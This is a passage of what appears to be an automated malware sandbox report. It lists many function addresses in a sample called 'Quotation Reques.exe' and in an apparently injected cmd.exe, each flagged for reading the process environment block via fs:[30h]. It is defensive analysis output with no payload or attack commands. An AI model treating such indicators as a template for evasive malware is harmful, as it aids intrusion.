          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01193A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01175210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01188A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01204257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AB5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03088B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0306D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03085BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03044257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0306B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0306B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03088A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03084015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03084015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03072073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03033884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03033884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03088F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03037794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0306FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03080EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03080EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03080EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0306FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEE730 mov eax, dword ptr fs:[00000030h]
